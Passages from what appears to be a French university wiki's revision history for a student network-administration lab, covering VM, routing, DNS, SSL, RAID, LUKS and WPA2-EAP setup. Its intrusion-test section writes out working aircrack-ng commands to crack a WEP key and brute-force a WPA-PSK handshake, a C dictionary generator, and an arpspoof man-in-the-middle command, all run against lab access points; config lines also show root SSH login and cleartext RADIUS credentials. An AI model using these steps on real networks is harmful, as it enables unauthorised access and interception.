5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
 KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:00:0F:FF ] &lt;br /&gt;
 Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
=== Exploitation de failles du système === &lt;br /&gt;
=== Cassage de mot de passe WPA-PSK par force brute ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons du trouvé le reseau wifi à cracker en scannant le reseau.&lt;br /&gt;
&lt;br /&gt;
Nous avons pu ainsi attendre une connexion sur le reseau pour récupérer un Handshake grace à airdump.&lt;br /&gt;
&lt;br /&gt;
Une fois les fichiers acquis, nous avons lancé sur un PC fixe plus puissant, la commande de crack par brute force.&lt;br /&gt;
&lt;br /&gt;
aircrack-ng -w fichierbruteforce.txt -b 00:24:0A:F2:C0:18 psk*.cap&lt;br /&gt;
&lt;br /&gt;
Code c pour générer le dictionnaire :&lt;br /&gt;
&lt;br /&gt;
 #include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
 #include &amp;lt;stdlib.h&amp;gt;&lt;br /&gt;
 &lt;br /&gt;
 int main(){&lt;br /&gt;
     FILE *f;&lt;br /&gt;
     f = fopen(&amp;quot;fichierbruteforce.txt&amp;quot;,&amp;quot;w&amp;quot;);&lt;br /&gt;
     if(f==NULL){&lt;br /&gt;
         printf(&amp;quot;Erreur lors de l'ouverture c'un fichier&amp;quot;);&lt;br /&gt;
         exit(1);&lt;br /&gt;
     }&lt;br /&gt;
 &lt;br /&gt;
     for(char a=0; a&amp;lt;10;a++)&lt;br /&gt;
     {&lt;br /&gt;
         for(char z=0; z&amp;lt;10;z++)&lt;br /&gt;
         {&lt;br /&gt;
             for(char e=0; e&amp;lt;10;e++)&lt;br /&gt;
             {&lt;br /&gt;
                 for(char r=0; r&amp;lt;10;r++)&lt;br /&gt;
                 {&lt;br /&gt;
                     for(char t=0; t&amp;lt;10;t++)&lt;br /&gt;
                     {&lt;br /&gt;
                         for(char y=0; y&amp;lt;10;y++)&lt;br /&gt;
                         {&lt;br /&gt;
                             for(char u=0; u&amp;lt;10;u++)&lt;br /&gt;
                             {&lt;br /&gt;
                                 for(char i=0; i&amp;lt;10;i++)&lt;br /&gt;
                                 {&lt;br /&gt;
                                     //printf(&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                     fprintf(f,&amp;quot;%d%d%d%d%d%d%d%d\n&amp;quot;,a,z,e,r,t,y,u,i);&lt;br /&gt;
                                 }&lt;br /&gt;
                             }&lt;br /&gt;
                         }&lt;br /&gt;
                     }&lt;br /&gt;
                 }&lt;br /&gt;
             }&lt;br /&gt;
         }&lt;br /&gt;
     }&lt;br /&gt;
     fclose(f);&lt;br /&gt;
     return 0;&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP ===&lt;br /&gt;
&lt;br /&gt;
L'objectif de cette manipulation est de nous faire passer pour un utilisateur de notre reseau au près d'un serveur web.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous devons modifier la valeur de la variable pour passer en mode routeur,&lt;br /&gt;
&lt;br /&gt;
 sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Nous commencons ainsi le piratage,&lt;br /&gt;
&lt;br /&gt;
attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web ===&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Réalisations ==&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de données ===&lt;br /&gt;
&lt;br /&gt;
On crée 3 disques virtuel de 1G (lvcreate -L1G -nclavaire-raid1 storage) et on les ajoute au fichier de config.&lt;br /&gt;
On peut créer le raid :&lt;br /&gt;
 mdadm --create /dev/md0 --level=5 --raid-devices=3 /dev/xvda5 /dev/xvda6 /dev/xvda7&lt;br /&gt;
 mkfs.ext4 /dev/md0&lt;br /&gt;
&lt;br /&gt;
Pour qu'il soit monté a chaque démarrage de la vm : &lt;br /&gt;
 mdadm --monitor --daemonise /dev/md0&lt;br /&gt;
&lt;br /&gt;
Et on l'ajoute au fichier /etc/fstab&lt;br /&gt;
&lt;br /&gt;
Avec des fichiers dans le ce volume, meme si un disque est déconnecté, les données sont toujours disponible.&lt;br /&gt;
&lt;br /&gt;
=== Chiffrement de données ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous formatons notre clé USB afin de pouvoir utiliser les partitions:&lt;br /&gt;
&lt;br /&gt;
 df -h&lt;br /&gt;
&lt;br /&gt;
Nous connaissons ainsi notre Filesystem:&lt;br /&gt;
&lt;br /&gt;
 fdisk /dev/sdb&lt;br /&gt;
&lt;br /&gt;
Nous pouvons créer une nouvelle partition primaire de la taille de la clé USB, 7.2 Go.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Puis nous quittons fdisk mais nous devons exécuter la commande&lt;br /&gt;
&lt;br /&gt;
 partprobe &lt;br /&gt;
&lt;br /&gt;
Pour re-écrire dans la table de partition.&lt;br /&gt;
&lt;br /&gt;
Nous commençons l'initialisations de notre clé cryptée &lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksFormat  /dev/sdb1&lt;br /&gt;
&lt;br /&gt;
 sudo cryptsetup luksOpen /dev/sdb1 home&lt;br /&gt;
&lt;br /&gt;
Nous pouvons accéder à notre clé depuis &lt;br /&gt;
&lt;br /&gt;
 cd /media/pifou/665....62/&lt;br /&gt;
&lt;br /&gt;
Nous avons créé un fichier test en sudo à la racine.&lt;br /&gt;
 &lt;br /&gt;
 sudo cryptsetup luksClose home &lt;br /&gt;
&lt;br /&gt;
Cette commande permet de fermer notre clé cryptée.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation WiFi par WPA2-EAP ===&lt;br /&gt;
&lt;br /&gt;
==== Configuration borne wifi ====&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# aaa authentication login eap_group3 group radius_group3&lt;br /&gt;
 wifi-ima5sc(config)# radius-server host 193.48.57.186 auth-port 1812 acct-port 1813 key secret_group3&lt;br /&gt;
 wifi-ima5sc(config)# aaa group server radius radius_group3&lt;br /&gt;
 wifi-ima5sc(config-server)# server 193.48.57.186 auth-port 1812 acct-port 1813&lt;br /&gt;
 wifi-ima5sc(config-server)#exit&lt;br /&gt;
 wifi-ima5sc(config)# dot11 ssid SSID_GROUP3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# mbssid guest-mode&lt;br /&gt;
 wifi-ima5sc(config-ssid)# vlan 303&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication open eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication network-eap eap_group3&lt;br /&gt;
 wifi-ima5sc(config-ssid)# authentication key-management wpa&lt;br /&gt;
 wifi-ima5sc(config-ssid)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Dot11Radio0&lt;br /&gt;
 wifi-ima5sc(config-if)# encryption vlan 303 mode ciphers aes-ccm tkip&lt;br /&gt;
 wifi-ima5sc(config-if)# mbssid&lt;br /&gt;
 wifi-ima5sc(config-if)#exit&lt;br /&gt;
 wifi-ima5sc(config)# ssid SSID_GROUP3&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int dot11radio0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
&lt;br /&gt;
 wifi-ima5sc(config)# int Gi0.3&lt;br /&gt;
 wifi-ima5sc(config-subif)# encapsulation dot1q 303&lt;br /&gt;
 wifi-ima5sc(config-subif)# bridge-group 3&lt;br /&gt;
 wifi-ima5sc(config-subif)#exit&lt;br /&gt;
 wifi-ima5sc(config)#exit&lt;br /&gt;
 wifi-ima5sc# write&lt;br /&gt;
&lt;br /&gt;
Nous avons configuré notre routeur wifi à l'aide de notre Vlan.&lt;br /&gt;
&lt;br /&gt;
==== Installation freeRadius ====&lt;br /&gt;
&lt;br /&gt;
 Sudo apt install freeradius&lt;br /&gt;
&lt;br /&gt;
dans le fichier&lt;br /&gt;
 /etc/freeradius/3.0/users&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons une ligne dans le but d'ajouter un utilisateur&lt;br /&gt;
 pifou Cleartext-Password := &amp;quot;pasglop&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/client.conf&lt;br /&gt;
&lt;br /&gt;
Nous ajoutons ce paragraphe pour ajouter l'adresse IP du routeur.&lt;br /&gt;
&lt;br /&gt;
 client pra_wifi {&lt;br /&gt;
    ipaddr = 10.60.100.10&lt;br /&gt;
    secret = secret_group3 }&lt;br /&gt;
&lt;br /&gt;
Dans le fichier &lt;br /&gt;
  /etc/freeradius/3.0/mods-enabled/eap&lt;br /&gt;
&lt;br /&gt;
On ajoute la ligne suivante afin de définir le protocole de communication&lt;br /&gt;
 default_eap_type = peap&lt;br /&gt;
&lt;br /&gt;
Et on peut lancer notre freeradius&lt;br /&gt;
 freeradius -X&lt;br /&gt;
&lt;br /&gt;
==== DHCP ====&lt;br /&gt;
Nous devons ensuite configurer notre DHCP afin de donner des adresses lors de la connexion au réseau wifi.&lt;br /&gt;
&lt;br /&gt;
6509E&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.10&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.100 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
C9200&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp pool groupe3&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#dns 193.48.57.186&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#network 10.60.103.0 255.255.255.0&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#default-router 10.60.103.254&lt;br /&gt;
 IMA5sc-R2(dhcp-config)#exit&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.0 10.60.103.100&lt;br /&gt;
 IMA5sc-R2(config)#ip dhcp excluded-address 10.60.103.200 10.60.103.255&lt;br /&gt;
 IMA5sc-R2(config)#exit&lt;br /&gt;
 IMA5sc-R2#sh ip dhcp binding&lt;br /&gt;
&lt;br /&gt;
== Site Web ==&lt;br /&gt;
&lt;br /&gt;
Achat de clavaire.site[https://www.clavaire.site] sur gandi&lt;br /&gt;
&lt;br /&gt;
Ajout de notre propre DNS : ns1.gandi.net avec un lien direct (glue records) vers notre ip publique de machine.&lt;br /&gt;
&lt;br /&gt;
== Ferme de serveur ==&lt;br /&gt;
&lt;br /&gt;
Ajout du bridge bridgeStudents sur la VM (fichier .cfg)&lt;br /&gt;
&lt;br /&gt;
commande installation python :&lt;br /&gt;
 ansible -i clavaire.ini -m raw -a &amp;quot;apt install python -y&amp;quot; all --user root --ask-pass&lt;br /&gt;
&lt;br /&gt;
commande envoi clé ssh :&lt;br /&gt;
 ansible -i clavaire.ini -m authorized_key -a 'user=root state=present key=&amp;quot;{{lookup(&amp;quot;file&amp;quot;,&amp;quot;/root/.ssh/id_rsa.pub&amp;quot;)}}&amp;quot;' --user root --ask-pass all&lt;/div&gt;</summary>
		<author><name>Tmertz</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54788</id>
		<title>TP sysres IMA5sc 2020/2021 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G3&amp;diff=54788"/>
				<updated>2020-12-17T08:14:35Z</updated>
		
		<summary type="html">&lt;p&gt;Tmertz : /* Ferme de serveur */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - SIMONIN/MERTZ - Clavaire&lt;br /&gt;
&lt;br /&gt;
== Informations générales ==&lt;br /&gt;
&lt;br /&gt;
 Hostname : Clavaire&lt;br /&gt;
 IP local : 100.64.0.25/28&lt;br /&gt;
 IP publique : 193.48.57.186/28&lt;br /&gt;
 URL : www.clavaire.site&lt;br /&gt;
&lt;br /&gt;
== Installation VirtualMachine ==&lt;br /&gt;
&lt;br /&gt;
Utilisation de xen pour créer notre machine virtuel sur capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
 xen-create-image --hostname=clavaire --ip=100.64.0.25 --netmask=255.255.255.0 --gateway=100.64.0.5 --password=[pwd habituel] --dir=/usr/local/xen --dist=buster&lt;br /&gt;
&lt;br /&gt;
Lancement de la VM puis connexion :&lt;br /&gt;
 xl create -c /etc/xen/clavaire.cfg&lt;br /&gt;
 xen console clavaire&lt;br /&gt;
&lt;br /&gt;
''Pour quitter la VM : CTRL + ]''&lt;br /&gt;
&lt;br /&gt;
On ajoute des disques à notre VM :&lt;br /&gt;
&lt;br /&gt;
 Rename disque et formatage (lvrename/mkfs)&lt;br /&gt;
 &lt;br /&gt;
 Modif .cfg pour ajouter disques&lt;br /&gt;
 &lt;br /&gt;
 Transfert fichier /var vers nouvelle partition&lt;br /&gt;
 &lt;br /&gt;
 Ajoute au /etc/fstab les disques&lt;br /&gt;
 &lt;br /&gt;
 Mount -a&lt;br /&gt;
&lt;br /&gt;
== Routage du site IPv4 ==&lt;br /&gt;
&lt;br /&gt;
Dans VM : /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
 address 193.48.57.186&lt;br /&gt;
 netmask 255.255.255.255&lt;br /&gt;
 up ip address add dev eth0 100.64.0.26/24&lt;br /&gt;
 up ip route add default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
 down ip address del dev eth0 100.64.0.26/24&lt;br /&gt;
 down ip route del default via 100.64.0.2 src 193.48.57.186&lt;br /&gt;
&lt;br /&gt;
Dans gateway&lt;br /&gt;
&lt;br /&gt;
1. ssh zabeth09 et zabeth30&lt;br /&gt;
&lt;br /&gt;
2. minicom -&amp;gt; /dev/ttyACM0 et /dev/ttyUSB0&lt;br /&gt;
&lt;br /&gt;
3. enable&lt;br /&gt;
&lt;br /&gt;
4. conf t&lt;br /&gt;
&lt;br /&gt;
5. ip route 193.48.57.186 255.255.255.255 100.64.0.26&lt;br /&gt;
&lt;br /&gt;
6. exit&lt;br /&gt;
&lt;br /&gt;
7. write&lt;br /&gt;
&lt;br /&gt;
Création du Vlan303 :&lt;br /&gt;
&lt;br /&gt;
Routeur 6509-E&lt;br /&gt;
&lt;br /&gt;
 vlan 303&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 303&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 ip 10.60.103.254&lt;br /&gt;
 vrrp 54 preempt&lt;br /&gt;
 vrrp 54 priority 110&lt;br /&gt;
&lt;br /&gt;
Routeur C9200&lt;br /&gt;
&lt;br /&gt;
 vlan 333&lt;br /&gt;
 name clavaire303&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no shut&lt;br /&gt;
 ip address 100.64.0.2 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 vlan 303&lt;br /&gt;
 vrrp 54 address-family ipv4&lt;br /&gt;
 address 10.60.103.254&lt;br /&gt;
 preempt&lt;br /&gt;
 vrrpv2&lt;br /&gt;
&lt;br /&gt;
== Services Internet ==&lt;br /&gt;
=== SSH ===&lt;br /&gt;
modif /etc/ssh/sshd_config :&lt;br /&gt;
&lt;br /&gt;
 Changement port : PORT 2222&lt;br /&gt;
 Login depuis root : PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
service ssh restart&lt;br /&gt;
&lt;br /&gt;
on peut donc :&lt;br /&gt;
ssh root@193.48.57.186 -p 2222&lt;br /&gt;
&lt;br /&gt;
=== DNS ===&lt;br /&gt;
Ajout DNS :&lt;br /&gt;
&lt;br /&gt;
- le faire dans gandi&lt;br /&gt;
- modifier fichier /etc/bind/named.conf.local en ajoutant :&lt;br /&gt;
 zone &amp;quot;clavaire.site&amp;quot; IN {&lt;br /&gt;
 	type master;&lt;br /&gt;
 	file &amp;quot;/etc/bind/db.clavaire.lan&amp;quot;;&lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
- puis avoir un ficher db.clavaire.lan :&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL    604800&lt;br /&gt;
 @       IN      SOA     ns1.clavaire.site. admin.clavaire.site. (&lt;br /&gt;
                               8         ; Serial&lt;br /&gt;
                          604800         ; Refresh&lt;br /&gt;
                           86400         ; Retry&lt;br /&gt;
                         2419200         ; Expire&lt;br /&gt;
                          604800 )       ; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 @       IN      NS      ns1.clavaire.site.&lt;br /&gt;
 @       IN      NS      ns6.gandi.net.&lt;br /&gt;
 @       IN      MX      100 clavaire.site.&lt;br /&gt;
 ns1     IN      A       193.48.57.186&lt;br /&gt;
 www     IN      A       193.48.57.186&lt;br /&gt;
         IN      AAAA    [ipv6]&lt;br /&gt;
&lt;br /&gt;
- relancer bind : &lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
- pour vérifier :&lt;br /&gt;
 host -tany clavaire.site&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation site web par certificat ===&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, nous avons créé un serveur apache2,&lt;br /&gt;
&lt;br /&gt;
 systemctl start apache2&lt;br /&gt;
&lt;br /&gt;
Nous avons ajouté à la liste des ports, le module ssl en écoute sur le port 443&lt;br /&gt;
&lt;br /&gt;
Ajout du certificat SSL&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous avons installé openssl puis nous avons créé une nouvelle clé &lt;br /&gt;
&lt;br /&gt;
 La commande est disponible par mail: simoninrichard@gmail.com&lt;br /&gt;
 &lt;br /&gt;
Nous avons deplacé la clé dans private puis nous avons donné la clé public à Gandi pour générer le fichier&lt;br /&gt;
&lt;br /&gt;
Pour la sécurisation SSl, nous avons utilisé le un serveur mail sur notre VM, mailx.&lt;br /&gt;
&lt;br /&gt;
Pour notre serveur mail, nous avons configuré un chemin de sauvegarde de mail Maildir/, qui ne correspond pas au chemin courant.&lt;br /&gt;
&lt;br /&gt;
 mailx -f Maildir/&lt;br /&gt;
&lt;br /&gt;
Nous avons aussi ajouté un alias afin de recéptionner les mails en admin et non en root.&lt;br /&gt;
&lt;br /&gt;
A l'aide du serveur mail, nous avons pu valider les différentes etapes de validation SSL&lt;br /&gt;
&lt;br /&gt;
Nous devons ensuite activer nos certificats SSL&lt;br /&gt;
&lt;br /&gt;
 a2enmod ssl&lt;br /&gt;
&lt;br /&gt;
Ensuite nous avons modifié notre fichier de conf de notre site: clavaire.site.conf, pour ajouté nos chemins de fichiers de certificat SSL.&lt;br /&gt;
&lt;br /&gt;
Puis un petit restart et notre site est sécurisé.&lt;br /&gt;
&lt;br /&gt;
=== Sécurisation de serveur DNS par DNSSEC ===&lt;br /&gt;
&lt;br /&gt;
Nous avons suivi les différentes étapes du sujet de TP. Nous avons choisis comme nom de zone: clavaire.site.&lt;br /&gt;
&lt;br /&gt;
Nous avons vérifié le bon fonctionnement à l'aide de :&lt;br /&gt;
&lt;br /&gt;
 https://dnsviz.net/d/clavaire.site/dnssec/&lt;br /&gt;
&lt;br /&gt;
== Tests d’intrusion ==&lt;br /&gt;
&lt;br /&gt;
=== Cassage de clef WEP d’un point d’accès WiFi ===&lt;br /&gt;
 &lt;br /&gt;
Dans cette partie, nous avons utilisé le reseau cracotte03 avec un cryptage WEP.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps nous avons annalysé nos interfaces avec  &lt;br /&gt;
&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
Le résultat obtenue est&lt;br /&gt;
&lt;br /&gt;
 PHY	 Interface	Driver		Chipset&lt;br /&gt;
 phy0	wlx40a5ef0f6518	rt2800usb	Ralink Technology, Corp. RT5370&lt;br /&gt;
&lt;br /&gt;
Nous obtenons ainsi l'interface de la clé WI-PI.&lt;br /&gt;
Nous démarrons notre interface réseau WIFI pour pouvoir commencer l'écoute sur le channel 3.&lt;br /&gt;
&lt;br /&gt;
 airmon-ng start wlx40a5ef0f6518 3&lt;br /&gt;
&lt;br /&gt;
Ainsi nous commençons à injecter dans notre réseau à l'aide du bssid de notre WIFI.&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -9 -e cracotte03 -a 04:DA:D2:9C:50:52 wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Nous commençons à capturer les VI sur notre point d'accès à l'aide de la commande&lt;br /&gt;
&lt;br /&gt;
 airodump-ng -c 3 --bssid 04:DA:D2:9C:50:52 -w test.txt wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
En même temps, nous effectuons des fausses authentification afin d'augmenter le traffic sur notre point d'accès&lt;br /&gt;
&lt;br /&gt;
 aireplay-ng -1 0 -e cracotte03 -a 04:DA:D2:9C:50:52  wlx40a5ef0f6518&lt;br /&gt;
&lt;br /&gt;
Puis nous utilisons aircrack afin d'utiliser tous les Vi pour cracker la clé WEP&lt;br /&gt;
&lt;br /&gt;
 aircrack-ng -b 04:DA:D2:9C:50:52 test*.cap &lt;br /&gt;
&lt;br /&gt;
et nous obtenons notre clé pour la cracotte03&lt;br /&gt;
&lt;br /&gt;
